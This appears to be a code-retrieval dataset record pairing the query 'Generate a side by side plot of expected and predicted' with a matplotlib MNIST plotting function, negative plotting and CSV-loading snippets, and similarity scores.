class LocationTable(csvtable.CSVTable):\n\n def __init__(self, name, headings):\n super(LocationTable, self).__init__(name, headings)\n self.data = []\n\n def AddRow(self, row):\n self.CheckRow(row)\n self.data.append(Interval(*row))\n\n data = csvtable.ReadMultitableCSV(filename, LocationTable)\n expected_tables = [\"BUSINESSTRIPS\", \"RESIDENCE\"]\n\n if sorted(data.keys()) != expected_tables:\n raise ValueError(\"Unexpected tables.\\n Expected: %s\\n Found: %s\" % (\n sorted(data.keys()), expected_tables))\n\n return TaxCalendar(data[\"RESIDENCE\"].data, data[\"BUSINESSTRIPS\"].data)", "def load_csv(csvpath):\n with open(csvpath, \"r\") as csvfile:\n data = []\n csvreader = csv.reader(csvfile, delimiter=\",\")\n\n # Skip the CSV Header\n next(csvreader)\n\n # Read the CSV data\n for row in csvreader:\n data.append(row)\n return data", "def read(data_src):\n # 1. Retrieve data set from source\n if isinstance(data_src, pd.DataFrame):\n # a. DataFrame source\n # Check column names\n try:\n # Check data type\n _ = data_src.columns.astype(float)\n\n # Add column values\n data_src.loc[-1] = data_src.columns.to_numpy(dtype=float) # adding a row\n data_src.index = data_src.index + 1 # shifting index\n data_src.sort_index(inplace=True)\n\n # Rename column names\n vals = ['col_' + str(k) for k in np.arange(data_src.shape[1])]\n data_src.columns = vals\n except ValueError:\n pass\n except TypeError:\n pass\n print(\"Data fetched from DataFrame\")\n return DataGP.clean_data(data_src)\n else:\n # b. CSV file\n file = str(data_src)\n try:\n with open(file, 'r') as f:\n dialect = csv.Sniffer().sniff(f.readline(), delimiters=\";,' '\\t\")\n f.seek(0)\n reader = csv.reader(f, dialect)\n raw_data = list(reader)\n f.close()\n\n if len(raw_data) <= 1:\n raise Exception(\"CSV file read error. File has little or no data\")\n else:\n # print(\"Data fetched from CSV file\")\n # 2. 
Get table headers\n keys = np.arange(len(raw_data[0]))\n if raw_data[0][0].replace('.', '', 1).isdigit() or raw_data[0][0].isdigit():\n vals = ['col_' + str(k) for k in keys]\n header = np.array(vals, dtype='S')\n else:\n if raw_data[0][1].replace('.', '', 1).isdigit() or raw_data[0][1].isdigit():\n vals = ['col_' + str(k) for k in keys]\n header = np.array(vals, dtype='S')\n else:\n header = np.array(raw_data[0], dtype='S')\n raw_data = np.delete(raw_data, 0, 0)\n # titles = np.rec.fromarrays((keys, values), names=('key', 'value'))\n # return titles, np.asarray(raw_data)\n d_frame = pd.DataFrame(raw_data, columns=header)\n return DataGP.clean_data(d_frame)\n except Exception as error:\n raise Exception(\"Error: \" + str(error))", "def test_from_file_csv(self):\n with TemporaryDirectory() as tmp:\n fp, df_test = save_simple_dataframe(tmp, 'test.csv')\n df_read = BaseDataClass.from_file(fp).df\n self.assertEqual(\n pd.testing.assert_frame_equal(df_test, df_read),\n None,\n )", "def get_training_data(self, csv_path):\n data = pd.read_csv(csv_path)\n data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']] = data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']].apply(pd.to_numeric)\n data[['Timestamp']] = data[['Timestamp']].apply(pd.to_datetime)\n data = data[data['Timestamp'] < self.end_time]\n data = data[data['Timestamp'] > self.start_time]\n\n return data", "def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)", "def import_from_csv(self) -> None:\n logging.info('import_from_csv')\n if self.target_table and str(self.target_table).lower() in [\"issue\", \"version\"]:\n if self.file_path and exists(self.file_path):\n # Read CSV file\n csv_data = pd.read_csv(self.file_path).to_dict('records')\n\n # Import Version\n if str(self.target_table).capitalize() == \"Version\":\n # Overwrite option\n if self.overwrite:\n self.session.query(Version).delete()\n click.echo('Overwrite Version table')\n\n for version in csv_data:\n if all(item in list(version.keys()) for item in ['tag', 'start_date', 'end_date']):\n newVersion=Version(\n project_id=version['project_id'],\n name=version[\"name\"], \n tag=version[\"tag\"], \n start_date=datetime.strptime(version[\"start_date\"], '%Y-%m-%d %H:%M:%S.%f'), \n end_date=datetime.strptime(version[\"end_date\"], '%Y-%m-%d %H:%M:%S.%f'), \n )\n \n try:\n self.session.add(newVersion)\n compute_version_metrics(self.session, self.configuration.current_branch, newVersion.project_id)\n click.echo('Importing ' + str(len(csv_data)) + ' version(s) on database')\n except Exception:\n logging.error(Exception)\n else:\n logging.error(\"CSV file no contain minimal mandatory fields\")\n sys.exit('CSV file no contain minimal mandatory fields')\n\n # Import Issue\n if str(self.target_table).capitalize() == \"Issue\":\n # Overwrite option\n if self.overwrite:\n self.session.query(Issue).delete()\n click.echo('Overwrite Issue table')\n\n for issue in csv_data:\n if all(item in list(issue.keys()) for item in ['number', 'created_at', 'updated_at']):\n newIssue=Issue(\n project_id=issue['project_id'],\n number=issue[\"number\"],\n title=issue[\"title\"],\n created_at=datetime.strptime(issue[\"created_at\"], '%Y-%m-%d %H:%M:%S.%f'),\n updated_at=datetime.strptime(issue[\"updated_at\"], '%Y-%m-%d %H:%M:%S.%f'))\n\n try:\n self.session.add(newIssue)\n click.echo('Importing ' + str(len(csv_data)) + ' issue(s) on database')\n except Exception:\n logging.error(Exception)\n else:\n logging.error(\"CSV file no contain minimal mandatory fields\")\n 
sys.exit('CSV file no contain minimal mandatory fields') \n\n self.session.commit()\n else:\n logging.error('File not found')\n sys.exit('File not found')\n else:\n logging.error('Target table not found')\n sys.exit('Target table not found')", "def run(self) -> pd.DataFrame:\n with open(self.file_path, 'r') as in_file:\n headers = in_file.readline()\n headers = headers.replace(\"\\n\", \"\")\n\n if ',' in headers:\n headers = headers.split(',')\n else:\n headers = headers.split()\n\n if headers == self.NORMAL_HEADERS:\n return self.normal_csv()\n else:\n return self.read_data_columns_to_rows()" ]
[ "0.8095777", "0.7471686", "0.7406693", "0.7337046", "0.7332259", "0.7143274", "0.69447905", "0.69225657", "0.68924946", "0.68774915", "0.6847433", "0.6822053", "0.6807061", "0.6763969", "0.6755038", "0.675341", "0.6733731", "0.67244375", "0.67158145", "0.67142403", "0.6712804", "0.6686776", "0.66596514", "0.6643881", "0.66405356", "0.66132224", "0.6608808", "0.6558562", "0.65575105", "0.6529429", "0.6527415", "0.6527415", "0.65225", "0.65192395", "0.6512353", "0.65110403", "0.6494256", "0.64807683", "0.6474674", "0.64685804", "0.6464597", "0.64587027", "0.64585185", "0.6456709", "0.64398193", "0.64048934", "0.6384188", "0.6384188", "0.638307", "0.6374308", "0.63730395", "0.6359743", "0.6355399", "0.63344043", "0.6330688", "0.6330272", "0.6313623", "0.63035506", "0.62998", "0.62995106", "0.6296893", "0.62759733", "0.62756217", "0.6272348", "0.6271794", "0.6257586", "0.62562984", "0.6252225", "0.6250873", "0.6250155", "0.62496364", "0.62408596", "0.62347317", "0.6231507", "0.62279373", "0.62023693", "0.62005085", "0.62002087", "0.6200039", "0.61946774", "0.61945635", "0.6183205", "0.61802244", "0.61782885", "0.6172457", "0.6168259", "0.61682", "0.6159136", "0.6154242", "0.615197", "0.6150946", "0.61492854", "0.61492854", "0.6145665", "0.614225", "0.6134886", "0.61345077", "0.61282045", "0.6127525", "0.6123948", "0.611712" ]
0.0
-1
Generate a side by side plot of expected and predicted
def plotExpectedPredicted(input, output, expected, label, fig, axes):
    n_batches = len(input)
    for batch in range(0, n_batches):
        input_2d = np.clip(np.reshape(input[batch], (28, 28)), 0, 1)#.astype(np.uint8)
        expected_2d = np.clip(np.reshape(expected[batch], (28, 28)), 0, 1)#.astype(np.uint8)
        output_2d = np.clip(np.reshape(output[batch], (28, 28)), 0, 1)#.astype(np.uint8)
        axes[batch, 0].imshow(input_2d, interpolation='nearest', cmap='gray')
        axes[batch, 0].set_title('Digit Label: {}'.format(label))
        axes[batch, 0].set_xbound([0, 28])
        axes[batch, 1].imshow(expected_2d, interpolation='nearest', cmap='gray')
        axes[batch, 1].set_title('Digit Label: {}'.format(label))
        axes[batch, 1].set_xbound([0, 28])
        axes[batch, 2].imshow(output_2d, interpolation='nearest', cmap='gray')
        axes[batch, 2].set_title('Digit Label: {}'.format(label))
        axes[batch, 2].set_xbound([0, 28])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plot_result(data, gt_y, pred_y):\n assert data.shape[0] == gt_y.shape[0]\n assert data.shape[0] == pred_y.shape[0]\n\n plt.figure()\n\n plt.subplot(1, 2, 1)\n plt.title('Ground Truth', fontsize=18)\n\n for idx in range(data.shape[0]):\n if gt_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.subplot(1, 2, 2)\n plt.title('Prediction', fontsize=18)\n\n for idx in range(data.shape[0]):\n if pred_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.show()", "def plot_result(data, gt_y, pred_y):\n assert data.shape[0] == gt_y.shape[0]\n assert data.shape[0] == pred_y.shape[0]\n\n plt.figure()\n\n plt.subplot(1, 2, 1)\n plt.title('Ground Truth', fontsize=18)\n\n for idx in range(data.shape[0]):\n if gt_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.subplot(1, 2, 2)\n plt.title('Prediction', fontsize=18)\n\n for idx in range(data.shape[0]):\n if pred_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.show()", "def parity_plot(y_pred, y_act):\n\n fig = plt.figure(figsize=FIG_SIZE)\n plt.scatter(y_act, y_pred)\n plt.plot([y_act.min(), y_act.max()], [y_act.min(), y_act.max()],\n lw=4, color='r')\n plt.xlabel('Actual')\n plt.ylabel('Predicted')\n\n return fig", "def illustrate_prediction(model, test_data, test_target):\n selects = np.random.random_integers(0, len(test_data), 16)\n labels = test_target[selects]\n predicts = model.predict(test_data[selects])\n plt.figure()\n for k in range(16):\n plt.subplot(4, 4, k+1)\n plot_face(test_data[selects[k]])\n if predicts[k] == 1:\n plt.title('smile')\n else:\n plt.title('ugly')\n\n if predicts[k] != labels[k]:\n plt.plot([0, 24], [0, 24], 'r', linewidth=2)\n plt.plot([0, 24], [24, 0], 'r', linewidth=2)", "def visualize_pred(y_test, y_pred, test_seq, window_out, num_plots, num_win_ser, cols_y, col_idx):\n \n \n ser_idx = [i for i in range(0, len(y_test), num_win_ser)]\n if num_plots > len(ser_idx):\n print(\"Too many plots, reduce the mumber\")\n else:\n indx = ser_idx[0:num_plots]\n days = range(num_win_ser)\n for idx in indx:\n CR = test_seq[idx][0][0][3]\n pred = y_pred[idx : idx+num_win_ser, window_out -1, col_idx]\n true = y_test[idx : idx+num_win_ser, window_out -1, col_idx]\n \n plt.title(\"Y_True V/S Y_Pred, CR: \"+ str(CR))\n plt.xlabel('Days')\n plt.ylabel(cols_y[col_idx])\n \n plt.plot(days, pred, label = 'Pred')\n plt.plot(days, true, label = 'True')\n \n plt.legend()\n plt.show()", "def _plot_train_test_experiment(mtrain, mval, metric_name, isState):\n # axes\n f, axes = plt.subplots(2,2,figsize=(12,10))\n ltrain = _plot_experiment(mtrain, axes[:,0], metric_name, isTrain=True)\n lval = _plot_experiment(mval, axes[:,1], metric_name, isTrain=False)\n # title\n target = \"State\" if isState else \"Output\"\n f.suptitle(f\"{target} Errors\")\n f.tight_layout()\n return f, axes", "def visualize_test_results(X, y, pred, signnames):\n assert(X.shape[0] == 14)\n nrows = 2\n ncols = 7\n nlabels = 43\n fig, axes = plt.subplots(nrows = 2 * nrows, ncols = ncols, figsize = (10, 10))\n for i in range(nrows):\n for j in range(ncols):\n aximg = axes[2*i, j]\n axprobs = axes[2*i + 1, j]\n idx = i*ncols + j\n\n img = X[idx]\n aximg.imshow(img)\n aximg.set_axis_off()\n\n probs = pred[idx]\n label = y[idx]\n colors = probs.shape[0] * [\"red\"]\n colors[label] = \"green\"\n\n n_top = 5\n 
topindices = sorted(np.arange(probs.shape[0]), key = lambda i: probs[i])[-n_top:]\n topprobs = probs[topindices]\n topcolors = [colors[i] for i in topindices]\n ypos = np.arange(n_top)\n axprobs.barh(ypos, topprobs, color = topcolors)\n axprobs.set_yticks(ypos)\n for ypos, l in zip(ypos, topindices):\n axprobs.text(0.025, ypos, textwrap.fill(signnames[l], 20), fontsize = 6)\n axprobs.set_axis_off()\n fig.savefig(os.path.join(img_dir, \"test_results.png\"))", "def visualize_test(test_data_full, test_data, thetas):\n fig, ax = plt.subplots()\n ax.scatter(test_data_full[\"Weight\"], test_data_full[\"Height\"], color='blue')\n ax.plot(test_data_full[\"Weight\"], predict(test_data, thetas[-1]), color='red', linewidth=2)\n return fig", "def _plot_good_pred_whitout_reject(self, test: Set, title=None, fig_size=None):\r\n if fig_size is not None:\r\n fig = plt.figure(figsize=fig_size)\r\n else:\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n goodclassified_index = []\r\n for idx_preds in range(self.preds.shape[1]):\r\n new_good_index = []\r\n for idx in range(self.preds.shape[0]):\r\n if test.labels[idx] == self.preds[idx, idx_preds]:\r\n new_good_index.append(idx)\r\n if new_good_index:\r\n ax.scatter(test.features[new_good_index, 0], self.features[new_good_index, 1],\r\n label='Good classified top{0}'.format(int(idx_preds + 1)))\r\n goodclassified_index += new_good_index\r\n misclassified = [idx for idx in range(self.preds.shape[0]) if idx not in goodclassified_index]\r\n if misclassified:\r\n ax.scatter(test.features[misclassified, 0], test.features[misclassified, 1],\r\n label='Misclassified', marker='x', c='red')\r\n box = ax.get_position()\r\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\r\n # Put a legend to the right of the current axis\r\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\r\n if title is not None:\r\n ax.set_title(title)\r\n plt.show()", "def plot_predictions(net, x_train, y_train, idx_train, x_val, y_val, idx_val):\n fig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(20, 30))\n pred1 = net.predict(x_val, batch_size=batch_size)\n # print(\"pred1.shape:\", pred1.shape)\n ax1.plot(idx_val, y_val, label=\"Actual Data\", marker=\"+\")\n ax1.plot(idx_val, pred1, label=\"Prediction\", marker=\"o\")\n # ax1.set_ylim(-0.1, 1.1)\n ax1.set_xlabel(\"Year\")\n ax1.set_ylabel(\"Sunspot Numbers\")\n ax1.legend()\n ax1.set_title(\"Predicted vs Actual Validation Data\")\n\n pred2 = net.predict(x_train, batch_size=batch_size)\n # print(\"pred2.shape:\", pred2.shape)\n ax2.plot(idx_train, y_train, label=\"Actual Data\", marker=\"+\")\n ax2.plot(idx_train, pred2, label=\"Prediction\", marker=\"o\")\n # ax2.set_ylim(-0.1, 1.1)\n ax2.set_xlabel(\"Year\")\n ax2.set_ylabel(\"Sunspot Numbers\")\n ax2.legend()\n ax2.set_title(\"Predicted vs Actual Training Data\")\n\n plt.tight_layout()\n\n filename = \"img/\"\n filename += datetime.now().strftime(\"%y%m%d_%H%M\")\n filename += \"_predicted_vs_actual_data.png\"\n fig.savefig(filename, format=\"png\")", "def plot_predictions(self):\n\n plt.title(\"Targets vs. 
Predictions\")\n plt.plot(self.T, label=\"Targets\")\n plt.plot(self.Y, label=\"Predictions\")\n plt.xlabel(\"Sample number\")\n plt.legend()\n plt.show()", "def plot_actual_vs_predicted_by_equations(df, x_variable, y_variables, plot_title):\n #Plot results\n df.plot(x=x_variable, y=y_variables, title=plot_title)\n plt.show()", "def plot_observed_predictions(self):\n \n # Plot of X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1) \n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(self.phd_filter['estimated_positions'][k][0], self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n \n # Plot of time vs X\n plt.subplot(1,3,2)\n for k in self.phd_filter['estimated_positions'].keys(): \n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][0], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n\n # Plot of time vs Y\n plt.subplot(1,3,3)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n plt.show();", "def plot_results(self, predictions: list):\n fig, ax = plt.subplots()\n cm = confusion_matrix(self.test[1], predictions)\n conf = confusion_matrix(self.test[1], predictions).ravel()\n nbr_labels = len(set(self.test[1]))\n cm = conf.reshape(nbr_labels, nbr_labels)\n sns.heatmap(cm, annot=True, fmt=\"d\", cmap=\"Spectral\")\n ax.set_xlabel(\"predicted label\")\n ax.set_ylabel(\"true label\")\n fig.savefig(\"confusion_matrix\")\n\n fig, ax = plt.subplots()\n x = self.train[0] + self.test[0]\n y = self.train[1] + self.test[1]\n x = [i[0] for i in x]\n y = [i for i in y]\n results = pd.DataFrame({\"polarity strength\": x, \"true label\": y})\n sns.boxplot(data=results, x=\"true label\", y=\"polarity strength\")\n fig.savefig(\"boxplot\")", "def plot_actual_predicted(self):\n predicted = [self.f(x, self.coefficients) for x in self.x_values]\n\n plt.scatter(self.x_values, self.y_values, label = \"Actual data\", c = 'b')\n plt.plot(self.x_values, predicted, label = \"Predicted data\", c = 'r')\n plt.title(f\"Graph of Prediected and Actual data points.\")\n plt.xlabel('x-axis')\n plt.ylabel('y-axis')\n plt.legend()\n plt.show()", "def analysis_plot(predictions, ys):\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 5))\n\n residuals = ys - predictions\n\n # Plot 1 - Predicted vs Actual\n sns.scatterplot(predictions, ys, ax=ax1)\n ax1.set_title('Predicted vs Actual', fontsize=20)\n ax1.set(xlabel='Predicted Ys', ylabel='Actual Ys')\n\n # Plot 2 - Residuals PLot (predicted vs residuals)\n sns.scatterplot(predictions, residuals, ax=ax2)\n ax2.set_title('Residuals Plot', fontsize=20)\n ax2.set(xlabel='Predicted Ys', ylabel='Residuals')\n\n # Plot 3 - QQ Plot\n sm.qqplot(residuals, ax=ax3, line='s')\n ax3.set_title('QQ Plot- Distribution of Residuals', fontsize=20)\n\n plt.show();", "def plot_results(\n train_data: tuple[Tensor, Tensor],\n test_data: tuple[Tensor, Tensor],\n correct_class: Tensor\n):\n #fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(21,7), subplot_kw=dict(box_aspect=1))\n fig1, (ax1, ax2) = plt.subplots(1, 2, figsize=(14,7), subplot_kw=dict(box_aspect=1))\n fig2, ax3 = plt.subplots(figsize=(7,7), subplot_kw=dict(box_aspect=1))\n 
ax1.set_title('Training data')\n plot_dataset(train_data, ax1)\n\n ax2.set_title('Test data')\n plot_dataset(test_data, ax2)\n\n ax3.set_title('Test prediction correctness')\n plot_dataset((test_data[0], correct_class.int()), ax3, cmap={0: '#ff0000', 1: '#00ff00'})\n \n fig1.savefig('plots/datasets')\n fig2.savefig('plots/predictions')\n plt.show()", "def generate_prediction_plots(y_true: np.ndarray,\n y_pred: np.ndarray,\n mses: np.ndarray,\n n_agents: int,\n n_options: int,\n save_path: Optional[Path] = None) -> None:\n n_to_plot = 10\n\n fig, axes = plt.subplots(n_to_plot * n_options, 2, figsize=(20, 60))\n trues, preds = select_predictions(mode='random', n_to_sample=n_to_plot, y_true=y_true, y_pred=y_pred)\n plot_preds(axes=axes, y_true=trues, y_pred=preds, n_agents=n_agents, n_options=n_options)\n plt.tight_layout()\n\n if save_path is not None:\n plt.savefig(save_path.joinpath(\"random_predictions.png\"), dpi=150)\n\n fig, axes = plt.subplots(n_to_plot * n_options, 2, figsize=(20, 60))\n trues, preds = select_predictions(mode='worst',\n n_to_sample=n_to_plot,\n y_true=y_true,\n y_pred=y_pred,\n mses=mses)\n plot_preds(axes=axes, y_true=trues, y_pred=preds, n_agents=n_agents, n_options=n_options)\n plt.tight_layout()\n\n if save_path is not None:\n plt.savefig(save_path.joinpath(\"worst_predictions.png\"), dpi=150)\n else:\n plt.show()\n\n plt.close('all')", "def evaluate_model_with_test_data(model, generator, iterations_count, label_name=''):\n y_predicted, y_etalon = [], []\n for i in range(0,iterations_count):\n x,y = next(generator)\n y_result = model.predict(x, y.shape[0])\n y_predicted.extend(y_result)\n y_etalon.extend(y)\n\n\n # corner1, bridge start, b_end, Big Left, BL-end, Sharp Right, end, Last left, end\n way_points = [69, 183, 276, 309, 348, 410, 456, 514, 612]\n wp_total = 819\n plt_pt_length = len(y_etalon)\n\n\n plt.figure(figsize=(24,6))\n plt.plot(y_predicted, 'r-')\n plt.plot(y_etalon, 'g--')\n plt.title('Predicted angle vs sample')\n plt.ylabel('Angle')\n plt.xlabel('Sample #')\n plt.legend(['Predicted', 'Initial'], loc='upper right')\n\n #add vertical lines to define critical regions on the plot\n for p in way_points:\n px = p / wp_total * plt_pt_length\n plt.axvline(px, ls='--', color='k')\n\n plt.gca().invert_yaxis()\n\n lbl = ''\n if len(label_name):\n lbl = '-' + label_name\n plt.savefig('test_vs_recorded_angle{}.png'.format(lbl), bbox_inches='tight')", "def plot_true_predicted(train_test_sets, radii_test_RF,\n radii_test_output_error):\n\n X_train, X_test, y_train, y_test = train_test_sets\n plt.figure()\n plt.errorbar(radii_test_RF, y_test.values,\n xerr=radii_test_output_error,\n fmt='.', c='C1', elinewidth=0.5,\n label='Random forest')\n # 1:1 line and labels\n plt.plot(np.sort(y_test.values), np.sort(y_test.values), 'k-', lw=0.25)\n\n plt.ylabel(r'True radius ($R_\\oplus$)')\n plt.ylabel(r'Predicted radius ($R_\\oplus$)')\n plt.legend(loc='lower right')\n return None", "def show_predictions(model, test_set, val_set, image_guess, img_res, data='OSNR', GRAY=True):\n \n ## Uses model to predict some amount of images\n predict = model.predict_classes(test_set, batch_size=5, verbose=1)\n \n ## Initialises variables for loop\n correctly_guessed = 0\n\n ## Defines figure dimensions\n fig = plt.figure(figsize=(20,30))\n\n ## Begins loop to find correct predictions and relay results to user\n ## Searches through the prediction array and compares it to the actual array.\n ## Displays image with the prediction and answer on the title\n for i in 
range(image_guess):\n correct = False\n actual = np.argmax(val_set[i])\n\n if predict[i] == actual:\n correctly_guessed += 1\n correct = True\n\n plt.subplot(6,3,i+1)\n fig.subplots_adjust(left=0.01,\n right=0.7,\n bottom=0.1,\n top=1.2,\n wspace=0.5,\n hspace=0.2\n )\n if GRAY == False:\n plt.imshow(test_set[i].reshape(img_res,img_res,3))\n else:\n plt.imshow(test_set[i].reshape(img_res,img_res), cmap='gray')\n\n if correct == True:\n if data == 'disp':\n plt.title('Correct! \\nPrediction = {}ps/nm Truth = {}ps/nm'\n .format((10+10*predict[i]), (10+10*(actual))), fontsize=15)\n \n if data == 'disp-short':\n plt.title('Correct! \\nPrediction = {} ~ {}ps/nm Truth = {} ~{}ps/nm'\n .format(100*(predict[i]), (100+100*predict[i]), 100*(actual), (100+100*(actual)), fontsize=15))\n \n if data == 'OSNR':\n plt.title('Correct! \\nPrediction = {}dB Truth = {}dB'\n .format((12+0.5*predict[i]), (12+0.5*(actual))), fontsize=15)\n \n \n else:\n if data == 'disp':\n plt.title('\\nPrediction = {}ps/nm Truth = {}ps/nm'\n .format((10+10*predict[i]), (10+10*(actual))), fontsize=15)\n \n if data == 'disp-short':\n plt.title('\\nPrediction = {} ~ {}ps/nm Truth = {} ~{}ps/nm'\n .format(100*(predict[i]), (100+100*predict[i]), 100*(actual), (100+100*(actual)), fontsize=15))\n \n if data == 'OSNR':\n plt.title('\\nPrediction = {}dB Truth = {}dB'\n .format((12+0.5*predict[i]), (12+0.5*(actual))), fontsize=15)\n\n ## Returns amount of predictions that were correct\n print('Correctly guessed = ', correctly_guessed)\n print('Inorrectly guessed = ', (image_guess-correctly_guessed))", "def visualizePredictions(testData,knn_predictions):\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n testData.dataDict[testData.reference] = knn_predictions\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n\r\n pass", "def plot_true_predictions(self):\n \n if self.data_generated:\n \n # Choosing a different color for each target\n n_targets = len(self.true_data['targets'])\n cmap = plt.get_cmap('gnuplot')\n colors = [cmap(i) for i in np.linspace(0, 0.9, n_targets)]\n\n # Plot of the ground truth X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(self.phd_filter['estimated_positions'][k][0], self.phd_filter['estimated_positions'][k][1], 'bx')\n for i in self.true_data['targets']:\n plt.plot(self.true_data['all_x'][i][:,0],self.true_data['all_x'][i][:,2],\\\n '-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n #plt.legend(loc='best')\n\n\n # Plot of the ground truth time vs X\n plt.subplot(1,3,2)\n for k in self.phd_filter['estimated_positions'].keys(): \n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][0], 'bx')\n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,0],\\\n '-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n\n # Plot of the ground truth time vs Y\n plt.subplot(1,3,3)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][1], 'bx')\n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,2],\\\n '-',label=\"true track %s\" %i,color=colors[i])\n 
plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n plt.show();\n\n elif self.data_given:\n raise ValueError(\"Cannot plot true positions if y_obs is given because the true x are not known.\")\n else:\n raise ValueError(\"No data to plot !\")", "def plot_results(infer_images, inference_predicted_class, inference_predictions, class_names=['plants', 'water']):\n plt.style.use(['dark_background', 'bmh'])\n rc('figure', figsize=(8, 8), max_open_warning=False)\n rc('axes', facecolor='none')\n plt.figure(figsize=(15, 15))\n\n for i, (infer_img, _) in enumerate(infer_images.take(10)):\n ax = plt.subplot(5, 2, i + 1)\n plt.imshow(infer_img.numpy()/255)\n\n # Find the predicted class from predictions\n m = \"Predicted: {}, {:.2f}%\".format(\n class_names[inference_predicted_class[i]], inference_predictions[i]*100)\n plt.title(m)\n plt.axis(\"off\")\n plt.show()", "def plotPredictedError():\n\tglobal normalized\n\n\twarmthPred = []\n\twarmthObserved = []\n\tcompPred = []\n\tcompObserved = []\n\tSStotalWarmth = 0\n\tSSresWarmth = 0\n\tSStotalComp = 0\n\tSSresComp = 0\n\tkeys = parser.getMappings(normalized)[0].keys()\n\tfor key in keys:\n\n\t\tif \"_\" in key:\n\t\t\twarmthAxis, compAxis = getPlotData(key)\n\t\t\twarmthPred.append(warmthAxis[3])\n\t\t\twarmthObserved.append(warmthAxis[2])\n\t\t\tcompPred.append(compAxis[3])\n\t\t\tcompObserved.append(compAxis[2])\n\n\tmeanObservedWarmth = np.mean(warmthObserved)\n\tmeanObservedComp = np.mean(compObserved)\n\tfor i in range(0, len(warmthObserved)):\n\t\tSStotalWarmth += (warmthObserved[i] - meanObservedWarmth)**2\n\t\tSSresWarmth += (warmthObserved[i] - warmthPred[i])**2\n\t\tSStotalComp += (compObserved[i] - meanObservedComp)**2\n\t\tSSresComp += (compObserved[i] - compPred[i])**2\n\n\n\tplt.axis([0, 100, 0, 100])\n\tfig = plt.figure(1)\n\tax = fig.add_subplot(111)\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(warmthObserved, warmthPred)\n\tprint(r_value**2)\n\ttext = ax.text(60, 20, \"R^2 value: \" + str(r_value**2) , \\\n fontsize = 12, color = 'black')\n\tplt.title(\"Observed vs Predicted Warmth\")\n\tplt.ylabel(\"Predicted Value\")\n\tplt.xlabel(\"Observed Value\")\n\tplt.scatter(warmthObserved, warmthPred)\n\tplt.plot([0,100], [0,100])\n\tplt.show()\n\n\tfig = plt.figure(1)\n\tax = fig.add_subplot(111)\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(compObserved, compPred)\n\tprint(r_value**2)\n\ttext = ax.text(60, 20, \"R^2 value: \" + str(r_value**2) , \\\n fontsize = 12, color = 'black')\n\tplt.axis([0, 100, 0, 100])\n\tplt.title(\"Observed vs Predicted Competence\")\n\tplt.ylabel(\"Predicted Value\")\n\tplt.xlabel(\"Observed Value\")\n\tplt.scatter(compObserved, compPred)\n\tplt.plot([0,100], [0,100])\n\tplt.show()", "def plot_observed_predicted(y_data, y_predict, ols_line=False, model_fit=None, figsize=(15, 10), save=False, end_name_fig='', folder='Charts'): \r\n\r\n end_name_fig = end_name_fig + '_' if end_name_fig is not None else ''\r\n\r\n fig, ax = plt.subplots(figsize=figsize)\r\n ax.scatter(y_data, y_predict)\r\n \r\n if ols_line == False:\r\n ax.plot([y_data.min(), y_data.max()], [y_data.min(), y_data.max()], 'k--', lw=4)\r\n\r\n else:\r\n line_fit = sm.OLS(y_data, sm.add_constant(y_predict, prepend=True)).fit()\r\n abline_plot(model_results=line_fit, ax=ax)\r\n\r\n ax.set_title('Predicted vs Observed')\r\n ax.set_ylabel('Observed values')\r\n ax.set_xlabel('Predicted values')\r\n\r\n if save == True:\r\n 
